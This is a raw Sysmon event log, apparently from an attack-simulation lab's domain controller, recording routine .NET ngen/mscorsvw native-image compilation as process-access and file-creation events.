10341000x80000000000000006325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:35.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913A-6005-2E02-00000000A301}3904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.985{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-913A-6005-2E02-00000000A301}3904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:34.985{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913A-6005-2E02-00000000A301}3904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:36.704{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913C-6005-3702-00000000A301}4772C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:36.704{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-913C-6005-3702-00000000A301}4772C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:36.704{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913C-6005-3702-00000000A301}4772C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:36.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913C-6005-3602-00000000A301}3092C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:36.548{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-913C-6005-3602-00000000A301}3092C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:36.548{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913C-6005-3602-00000000A301}3092C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:36.485{59A5CD1D-913C-6005-3502-00000000A301}5104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\13f0-0\PresentationFramework.Royale.dll2021-01-18 13:46:36.485 10341000x80000000000000006349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:36.220{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913C-6005-3502-00000000A301}5104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:36.220{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-913C-6005-3502-00000000A301}5104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:36.220{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913C-6005-3502-00000000A301}5104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:36.157{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913C-6005-3402-00000000A301}3220C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:36.141{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-913C-6005-3402-00000000A301}3220C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:36.141{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913C-6005-3402-00000000A301}3220C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:36.079{59A5CD1D-913B-6005-3302-00000000A301}4756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1294-0\PresentationFramework.Luna.dll2021-01-18 13:46:36.079 10341000x80000000000000006363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:37.907{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913D-6005-3902-00000000A301}4104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:37.891{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-913D-6005-3902-00000000A301}4104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:37.891{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913D-6005-3902-00000000A301}4104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:37.782{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-913D-6005-3802-00000000A301}1196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:37.782{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-913D-6005-3802-00000000A301}1196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:37.782{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-913D-6005-3802-00000000A301}1196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:37.688{59A5CD1D-913C-6005-3702-00000000A301}4772C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12a4-0\PresentationUI.dll2021-01-18 13:46:37.688 10341000x80000000000000006386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.782{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9141-6005-4002-00000000A301}2120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.782{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9141-6005-4002-00000000A301}2120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.782{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9141-6005-4002-00000000A301}2120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 